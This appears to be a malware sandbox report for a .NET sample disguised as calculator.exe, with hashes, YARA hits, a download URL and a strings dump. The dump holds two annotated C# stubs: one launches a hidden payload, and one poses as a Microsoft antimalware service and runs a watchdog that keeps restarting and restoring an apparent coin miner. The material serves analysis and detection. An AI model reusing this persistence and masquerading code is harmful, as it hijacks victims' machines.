Sample details: 8c2d2a86f280bfd2fa619f75b4a56782 --

Hashes
MD5: 8c2d2a86f280bfd2fa619f75b4a56782
SHA1: af1686a221de6f90388ee6c4c4ae5ed7fa66ba71
SHA256: 62766a399be76b5e0450667145483e0a506a372a7268b6e21c30c01a74de2398
SSDEEP: 1536:AIoxfIuAT4nbGnj59DUgkTH33sFhK6tNCoYVHWC/hbCd:4xfIuAT4nbG99DtWcF1tNcHWC/hbCd
Details
File Type: PE32
Yara Hits
YRP/Microsoft_Visual_Studio_NET | YRP/Microsoft_Visual_C_v70_Basic_NET_additional | YRP/Microsoft_Visual_C_Basic_NET | YRP/Microsoft_Visual_Studio_NET_additional | YRP/Microsoft_Visual_C_v70_Basic_NET | YRP/NET_executable_ | YRP/NET_executable | YRP/NETexecutableMicrosoft | YRP/IsPE32 | YRP/IsNET_EXE | YRP/IsWindowsGUI | YRP/IsBeyondImageSize | YRP/domain | YRP/IP | YRP/contentis_base64 | YRP/CRC32b_poly_Constant |
Source
http://dropbox.com/s/pfjytp8t6n386q5/calculator.exe?dl=1
Strings
          	            !This program cannot be run in DOS mode.
`.rsrc
@.reloc
NDX+/ 
i-J 5O
 cv,{X+Y
+0 x&&
 9jwHX+
tX+>~%
 iC((j
 (IuaX
 ;~Uy 
 ^!HBX+
X+, ZV
 u$O=X+
 4HW*X
 E7+QX+	
cza 3I
0Z` bp
X+W v|
 jw1?X
+3 6	@
X+t S%
 K;T) \J
`7X+Y~
ZXf .P
 Y-V)X
 Q]i} 
<ZXY ^v
 qul} _
+	 f]]d
 m;G7X
 vse6X+
 Dse<X
 a_}dX+o~	
Zva+8 
rc H:;
M| 'x@
 .G{uY+
 1|GbX
 3;v|X
 Ox6HX
 !A9iX
tX+3 c
 us7:X
 puINX
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
using System;
using System.Diagnostics;
using Microsoft.Win32;
using System.Drawing;
using System.IO;
using System.Reflection;
[assembly: AssemblyTitle("{GETNAME]")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("{GETCOMPANY]")]
[assembly: AssemblyProduct("{GETPRODUCT]")]
[assembly: AssemblyCopyright("Copyright 
  2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
namespace IconStealer
    class Program
        /// <summary>
        /// Entry point of the embedded "IconStealer" stub as recovered from the sample's strings table.
        /// If hostdl.exe exists under %APPDATA%\Microsoft\Network\Connections it is started through the
        /// shell with that folder as working directory; otherwise the stub does nothing and exits.
        /// The assembly attributes above carry template placeholders ({GETNAME], {GETCOMPANY], {GETPRODUCT]),
        /// and the strings table lists CSharpCodeProvider / CompileAssemblyFromSource, which suggests the
        /// outer binary fills these in and compiles this source at runtime — TODO confirm by dynamic analysis.
        /// </summary>
        /// <param name="args">Unused.</param>
        static void Main(string[] args)
        {
            // Roaming %APPDATA% is user-writable, so no elevation is needed for this drop location.
            string appexe= Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            // Full folder and file path are stable host artifacts; both are worth a file-path detection rule.
            string wdir = appexe + @"\Microsoft\Network\Connections";
            appexe = appexe + @"\Microsoft\Network\Connections\hostdl.exe";
            if (File.Exists(appexe))
            {
                // The variable name hints at a coin miner; hostdl.exe's content is not on this page, so that is unconfirmed.
                Process miner = new Process();
                miner.StartInfo.FileName = appexe;
                // UseShellExecute = true: launched via the shell. No CreateNoWindow / WindowStyle is set in this
                // stub, so any console or window of the child would be visible (the outer binary's strings do
                // list set_CreateNoWindow / set_WindowStyle, but not in this fragment).
                miner.StartInfo.UseShellExecute = true;
                miner.StartInfo.WorkingDirectory = wdir;
                miner.Start();
            }
        }
using System;
using System.Threading;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTitle("Antimalware service executable")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyProduct("Antimalware service executable")]
[assembly: AssemblyCopyright("Copyright 
  2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
namespace Supreme
    class Class1
        /// <summary>
        /// Entry point of the embedded "Supreme" watchdog as recovered from the sample's strings table.
        /// The assembly metadata above masquerades as "Antimalware service executable" / "Microsoft Corporation".
        /// Behaviour visible here: exit immediately if another process named "defender" is already running
        /// (single-instance check by image name), then loop forever every 100 ms: (1) start
        /// %APPDATA%/Microsoft/Network/Connections/hostdl.exe whenever no "hostdl" process exists, and
        /// (2) restore hostdl.exe from a staged copy at %APPDATA%\Microsoft\Internet Explorer\History
        /// whenever the file is missing. Killing hostdl.exe or deleting it is therefore undone within ~100 ms
        /// while this process lives; response should stop this watchdog first and remove both files.
        /// </summary>
        /// <param name="args">Unused.</param>
        static void Main(string[] args)
        {
			if (InstanceCheck())
            {
                // Self-terminate: another instance of this image is already running.
                Process defender = Process.GetCurrentProcess();
                defender.Kill();
            }
            string appdata = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            // Forward slashes here, backslashes in the sibling stub — same folder on Windows either way.
			string wdir = appdata + "/Microsoft/Network/Connections/";
            appdata = appdata + "/Microsoft/Network/Connections/hostdl.exe";
            string copy = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            // Used as the *source* of File.Copy below, so "History" is expected to be a file (a staged copy of
            // the payload) rather than the usual IE history folder — a second artifact to look for on disk.
            copy = copy + @"\Microsoft\Internet Explorer\History";
			Process miner;
            // No exit condition: the process runs until it is killed or an unhandled exception escapes.
            while (true)
            {
                Thread.Sleep(100);
                if (check())
                {
				// Start failures (e.g. Win32Exception when the file is absent) are silently swallowed.
				try{
					miner=new Process();
					miner.StartInfo.FileName = appdata;
					miner.StartInfo.UseShellExecute=true;
					miner.StartInfo.WorkingDirectory=wdir;
                    miner.Start();
				}catch{}
                }
                if (!File.Exists(appdata))
                {
                    // Not wrapped in try/catch: if the staged "History" file or the target folder is missing,
                    // File.Copy throws and this process exits — observable in a sandbox as an early termination.
                    File.Copy(copy, appdata);
                }
            }
        }
        /// <summary>
        /// Single-instance check by process image name: counts processes named "defender" (presumably the
        /// name this image runs under — TODO confirm) and reports whether more than one exists.
        /// The caller terminates the current process when this returns true.
        /// </summary>
        /// <returns>True when two or more "defender" processes are running; otherwise false.</returns>
        static bool InstanceCheck()
        {
			Process[] defender = Process.GetProcessesByName("defender");
            // Length > 1 because the current process itself is counted when it runs as defender.exe.
            if (defender.Length>1)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
        /// <summary>
        /// Reports whether the payload needs (re)starting: true when no process named "hostdl" is running.
        /// Matching is by image name only, so any process called hostdl.exe satisfies the watchdog.
        /// </summary>
        /// <returns>True when no "hostdl" process exists; otherwise false.</returns>
        static bool check()
        {
            Process[] minr = Process.GetProcessesByName("hostdl");
            if (minr.Length==0)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
8YqE/R
S|UH=v
z>1xTb
%-f8+Q?
nWpOd2$
Q./#,]
&yt,}R
M;hy]WF[G[R@h}Z@QFZQ@
qLDX[FQF
S"teAKZG[GN\t
AFLG_[
lMNMFLMZt@
^]EPXZ]E^
^\\^Y\_
Uy0&oKR
"(9$8$-?
9./.%?"*'8
#m|XRC^B^WEmrCTUT_EXP]BmbEPCETC|^UD]T
>LQvjm4ikvz|jj<
~B@QFJHUDK\Xu
;9$=81&
1&'=;:B
C]ZQLQ
?{5z#{
bsW]LQMQXJb}L[Z[PJW_RMbmJ_LJ[LsQZKR[
0ohn}hiq7h
l&33dqn2lssp2quryn{}hy2
sq&())*,
[S	b1)E
L 36PQM
h+773yll1p/&0&)wm!&$&7m7& +l
iWz=QG
E/K4i?
':60&&
-%9:'0'
q|6uk| 
5&$"0ts
?IL_][I
dXQC@VERkz^TEXDXQCk`^YSX@DktBEERYCaRED^XYkeBYk:
]Lhbsnrngu]Oduvnsj]Bnoodbuhnor]inruem/dyd
-L]ysb
vdL^udg
~~usdy
5e~{MUJGJB
677<:-067*
5/3JU+
l%*/&0l$7
'+|OQWNH[
JTSPZPSI
)`ojcu)a)qohkakhr(c~c@
pu|j6~6npwt~twm7|a|)
&:P1o;
ANKBTF
X`)&#*<+:
?vy|uc?gy~}w}~d>uhu
_8U! .
;1 =!=4&
7&%= 9
=<<71&;=<!7
cNY=SB
4*-.$.-7M
j#,) 6j2,+("(+1k = 
K@AN[J
dLj\.3
rdii)%<i'41i17%#!y
0xu9x;*!(,761?0,xu,x%
0q70)$:
nYe7z58
[/1\Tu
1Yyy\W
&;"=01&
v4.0.30319
#Strings
Supreme.exe
Supreme
mscorlib
System
System.Drawing
System.Windows.Forms
System.IO.Compression.FileSystem
Kernel32.dll
advapi32.dll
Environment
GetFolderPath
SpecialFolder
String
Concat
Directory
System.IO
Exists
CreateDirectory
DirectoryInfo
Thread
System.Threading
CompilerParameters
System.CodeDom.Compiler
set_OutputAssembly
set_GenerateExecutable
set_CompilerOptions
get_ReferencedAssemblies
StringCollection
System.Collections.Specialized
CompilerResults
get_Errors
CompilerErrorCollection
SetAttributes
FileAttributes
CompilerError
get_ErrorText
Format
Console
WriteLine
RegistryKey
Microsoft.Win32
CreateSubKey
GetValueNames
op_Inequality
GetValue
Contains
ExtractAssociatedIcon
Create
FileStream
Stream
FileVersionInfo
System.Diagnostics
GetVersionInfo
get_FileDescription
Replace
get_CompanyName
get_ProductName
Delete
SetValue
Process
GetCurrentProcess
GetProcessesByName
GetProcessById
Application
get_Handle
MessageBox
DialogResult
MessageBoxButtons
MessageBoxIcon
GenericSecurityDescriptor
System.Security.AccessControl
get_BinaryLength
GetBinaryForm
RawSecurityDescriptor
get_DiscretionaryAcl
RawAcl
InsertAce
GenericAce
get_ExecutablePath
op_Equality
GetCommandLineArgs
ReadAllBytes
WriteAllBytes
get_StartInfo
ProcessStartInfo
set_FileName
set_UseShellExecute
set_WorkingDirectory
set_Arguments
get_FileVersion
get_Id
WebClient
System.Net
DownloadFile
ZipFile
System.IO.Compression
ExtractToDirectory
set_CreateNoWindow
set_WindowStyle
ProcessWindowStyle
UnhandledExceptionEventArgs
get_ExceptionObject
get_Headers
WebHeaderCollection
DownloadData
get_Is64BitOperatingSystem
OpenSubKey
Substring
Object
ReferenceEquals
GetTypeFromHandle
RuntimeTypeHandle
g.resources
resource
<Module>
Dictionary`2
System.Collections.Generic
EmptyTypes
Double
ThreadStart
UInt16
CSharpCodeProvider
Microsoft.CSharp
IDictionary`2
UInt32
Single
CodeDomProvider
CompileAssemblyFromSource
IDisposable
Dispose
CollectionBase
System.Collections
get_Count
GetEnumerator
IEnumerator
get_Current
MoveNext
UInt64
Registry
CurrentUser
Random
SetThreadExecutionState
GetKernelObjectSecurity
SetKernelObjectSecurity
Win32Exception
System.ComponentModel
SecurityIdentifier
System.Security.Principal
WellKnownSidType
CommonAce
AceFlags
AceQualifier
Exception
NameValueCollection
LocalMachine
get_Assembly
Assembly
System.Reflection
ResourceManager
System.Resources
CultureInfo
System.Globalization
GetString
get_FullName
Encoding
System.Text
get_UTF8
GetBytes
GetExecutingAssembly
GetManifestResourceStream
SeekOrigin
BitConverter
ToInt32
.cctor
value__
FlagsAttribute
RuntimeMethodHandle
Module
MethodBase
IntPtr
get_Module
ResolveMethod
get_MethodHandle
GetFunctionPointer
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
System.Runtime.CompilerServices
AssemblyProductAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
AssemblyTitleAttribute
AssemblyDescriptionAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
CompilationRelaxationsAttribute
AssemblyCopyrightAttribute
AssemblyFileVersionAttribute
DebuggableAttribute
DebuggingModes
Microsoft Corporation
WrapNonExceptionThrows
 Windows
.NETFramework,Version=v4.5
FrameworkDisplayName
.NET Framework 4.54
 Windows
Copyright 
  2017
1.0.0.6
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>